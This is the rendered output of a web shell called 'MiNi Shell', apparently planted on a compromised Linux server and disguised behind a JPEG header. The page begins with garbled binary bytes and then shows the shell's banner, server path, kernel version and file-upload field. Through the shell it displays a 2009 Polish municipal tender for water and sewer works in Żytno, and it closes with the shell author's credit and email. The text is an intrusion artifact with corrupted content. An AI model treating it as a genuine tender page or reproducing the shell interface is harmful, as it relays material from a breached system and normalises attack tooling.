JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353436-N-2009.html

<p class="kh_header"><b>Żytno: Poprawa warunków życia mieszkańców gminy Żytno poprzez rozbudowę infrastruktury technicznej w zakresie gospodarki wodno - ściekowej tj.: 
a) budowa sieci wodociągowej z przyłączami w miejscowościach: Żytno, Pławidła, Rędziny, 
b) budowa sieci wodociągowej z przyłączami w miejscowościach: Pągów, Sady,
c) rozbudowa kanalizacji sanitarnej w Żytnie - II etap</b><br>
<b>Numer ogłoszenia: 353436 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żytno , ul. Krótka 4, 97-532 Żytno, woj. łódzkie, tel. 034 3277001, faks 034 3269010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zytno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa warunków życia mieszkańców gminy Żytno poprzez rozbudowę infrastruktury technicznej w zakresie gospodarki wodno - ściekowej tj.: 
a) budowa sieci wodociągowej z przyłączami w miejscowościach: Żytno, Pławidła, Rędziny, 
b) budowa sieci wodociągowej z przyłączami w miejscowościach: Pągów, Sady,
c) rozbudowa kanalizacji sanitarnej w Żytnie - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Poprawa warunków życia mieszkańców gminy Żytno poprzez rozbudowę infrastruktury technicznej w zakresie gospodarki wodno - ściekowej tj.: 
a) budowa sieci wodociągowej z przyłączami w miejscowościach: Żytno, Pławidła, Rędziny, 
  - sieć wodociągowa z rur PCV o śr.160 mm                          L= 3 210 m 
  - sieć wodociągowa z rur PCV o śr.   110 mm                       L= 3 760 m 
  - przyłącza wodociągowe z rur PE o śr. 40 /32mm               L= 1 102 m / 38 szt.
b) budowa sieci wodociągowej z przyłączami w miejscowościach: Pągów, Sady,
  - sieć wodociągowa z rur PCV o śr.   110 mm                       L= 3 246 m 
  - przyłącza wodociągowe z rur PE o śr. 40 /32mm               L= 334 m / 18 szt.
c) rozbudowa kanalizacji sanitarnej w Żytnie - II etap :
  - kanał grawitacyjny z rur PCV o śr. 200/5,9 mm - 1756 m,
  - kanał tłoczny z rur PE o śr. 90 mm                    - 708 m,
  - kanał grawitacyjny z rur o śr. 160/4,7 mm          - 229 m oraz 95 m,
  - przepompownie ścieków; P-4 o śr. 1400 mm moc instalowana 3,40 kW, P-5 o śr. 1400 mm moc instalowana 2,20 kW, P-7 o śr. 1200 mm moc instalowana 2,20 kW,
  - studnie rewizyjne szczelne z kręgów betonowych o śr. 1200 mm z włazem żeliwnym typu ciężkiego 40 t  - 60 szt.
  - studnie rewizyjne z kręgów betonowych o śr. 1000 mm na terenie posesji z włazem żeliwnym typu lekkiego 37 szt.
  - utwardzenie wjazdów na posesje tłuczniem kamiennym gr. 10 cm,
  - odtworzenie chodników,
  - odtworzenie nawierzchni tłuczniowej i asfaltowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości:  70 000,00 zł  , słownie: siedemdziesiąt tysięcy złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Posiadają uprawnienia do wykonywania określonej działalności, co oznacza, że prowadzą działalność gospodarczą w zakresie objętym zamówieniem; dysponują lub będą dysponować osobami do kierowania budową z potwierdzonymi uprawnieniami budowlanymi specjalności: sieci wodociągowych i instalacji sanitarnych, robót drogowych, robót elektrycznych i aktualnym członkostwem w Izbie Inżynierów.
    Wykonawca który wskazał osoby, którymi będzie dysponował, składa pisemne zobowiązanie innych podmiotów udostępniających osoby zdolne do wykonania zamówienia podane w wykazie.

2. Posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny a także dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, co oznacza, że wykonawca wykonał w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 zamówienie związane z wykonywaniem robót budowlanych odpowiadających robotom stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 200 %  wartości ofertowej w tym minimum 100% wartości dotyczącej budowy kanalizacji, wraz z potwierdzeniem należytego wykonania (referencje) wskazanego przez wykonawcę zamówienia.
    Dysponują lub będą dysponować niezbędnym do wykonania zamówienia sprzętem tj.; samochód dostawczy 0,9 t  - 3 szt, spycharka gąsienicowa 74 kW  - 1 szt, spycharka gąsienicowa 55 kW  - 1 szt, koparka 0,25 m3  - 1 szt, samochód skrzyniowy 5t - 2 szt, maszyna do wierceń poziomych  - 1 kpl, zagęszczarka wibracyjna  1 szt, pompa wirnikowa spalinowa 61-80 m3/h, samochód z przyczepą dłużycową, spawarka wirująca 300 A, wyciąg do urobku ziemi z napędem elektrycznym 0,18 t, żuraw samochodowy 6 t, wciągarka mechaniczna z napędem elektrycznym 1,6 t, wciągarka mechaniczna spalinowa 1,5 t, kocioł do podgrzewania asfaltu, piła spalinowa z tarcza do cięcia nawierzchni, sprężarka powietrza spalinowa 4 - 5 m3/min, zrywarka przyczepna, walec statyczny samojezdny 10 t, walec statyczny samojezdny 15 t, rozkładarka mas bitmicznych o szerokości 4 m, koparka gąsiennicowa 0,6 m3, samochód samowyładowczy 5 t - 2 szt, kocioł do podgrzewania asfaltu, urządzenie do betonowania podwodnego, wciągarka ręczna 3 - 5 t, wibrator powierzchniowy, piła do cięcia kostki .
     Wykonawca który wskazał narzędzia i urządzenia, którymi będzie dysponował, składa pisemne zobowiązanie innych podmiotów udostępniających niezbędne do wykonania zamówienia narzędzia i urządzenia podane w wykazie.    
    Zatrudniali w okresie ostatnich 3 lat, w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 10 pracowników produkcyjnych 

3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, co oznacza, że posiadają środki finansowe w wysokości 100 % kwoty ofertowej na realizację zamówienia 

4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego. 

5. Udzielą 36-miesięcznej gwarancji jakości na wykonane zamówienie.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Formularz oferty 

2. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych 

3. Szczegółowy kosztorys ofertowy sporządzony na podstawie załączonego przedmiaru robót 

4. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do Ewidencji Działalności Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do Ewidencji Działalności Gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .

5. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24, ust. 1, pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

6. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24, ust. 1, pkt 9 wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

7. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 

8. Dokumenty stwierdzające, że osoby - kierownicy budowy wskazani przez wykonawcę posiadają uprawnienia budowlane w specjalnościach:
   - sieci wodociagowych i instalacyjnych,
   - robót drogowych,
   - robót elektrycznych 
oraz oświadczenie o gotowości współpracy z wykonawcą, w przypadku gdy osoba przewidziana do realizacji zamówienia nie była jego pracownikiem a także ważne zaświadczenie o członkostwie w Izbie Inżynierów. 
    Posiadanie majstra budowy oraz 10 pracowników produkcyjnych.
    Wykonawca który wskazał osoby, którymi będzie dysponował, składa pisemne zobowiązanie innych podmiotów udostępniających osoby zdolne do wykonania zamówienia podane w wykazie.

9. Informację banku lub Spółdzielczej Kasy Oszczędnościowo-Kredytowej, w których wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (minimum 100% środków wartości złożonej oferty), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 

10. Informację na temat przeciętnej liczby zatrudnionych pracowników oraz personelu kierowniczego, w okresie ostatnich 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie 

11. Wykaz niezbędnego do wykonania zamówienia sprzętu tj.; samochód dostawczy 0,9 t  - 3 szt, spycharka gąsienicowa 74 kW  - 1 szt, spycharka gąsienicowa 55 kW  - 1 szt, koparka 0,25 m3  - 1 szt, samochód skrzyniowy 5t - 2 szt, maszyna do wierceń poziomych  - 1 kpl, zagęszczarka wibracyjna  1 szt, pompa wirnikowa spalinowa 61-80 m3/h, samochód z przyczepą dłużycową, spawarka wirująca 300 A, wyciąg do urobku ziemi z napędem elektrycznym 0,18 t, żuraw samochodowy 6 t, wciągarka mechaniczna z napędem elektrycznym 1,6 t, wciągarka mechaniczna spalinowa 1,5 t, kocioł do podgrzewania asfaltu, piła spalinowa z tarcza do cięcia nawierzchni, sprężarka powietrza spalinowa 4 - 5 m3/min, zrywarka przyczepna, walec statyczny samojezdny 10 t, walec statyczny samojezdny 15 t, rozkładarka mas bitmicznych o szerokości 4 m, koparka gąsiennicowa 0,6 m3, samochód samowyładowczy 5 t - 2 szt, kocioł do podgrzewania asfaltu, urządzenie do betonowania podwodnego, wciągarka ręczna 3 - 5 t, wibrator powierzchniowy, piła do cięcia kostki.
      Wykonawca który wskazał narzędzia i urządzenia, którymi będzie dysponował, składa pisemne zobowiązanie innych podmiotów udostępniających niezbędne do wykonania zamówienia narzędzia i urządzenia podane w wykazie.

12. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów (referencje) potwierdzających, że roboty te zostały wykonane należycie. 

13. Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty, zysk oraz  zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.

14. Polisę lub inny dokument ubezpieczenia potwierdzajacy, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na okres trwania prac, w przypadku braku polisy na cały w/w okres,  wymagane jest złożenie oświadczenia o przedłużeniu ubezpieczenia na okres trwania robót.

15. Wykaz osób i podmiotów które będą wykonywać zamówienie.

16. Zaakceptowany projekt umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zytno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Żytno
Krótka 4
97-532 Żytno
Pokój nr 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2009 godzina 10:45, miejsce: Gmina Żytno
Krótka 4
97-532 Żytno
Pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com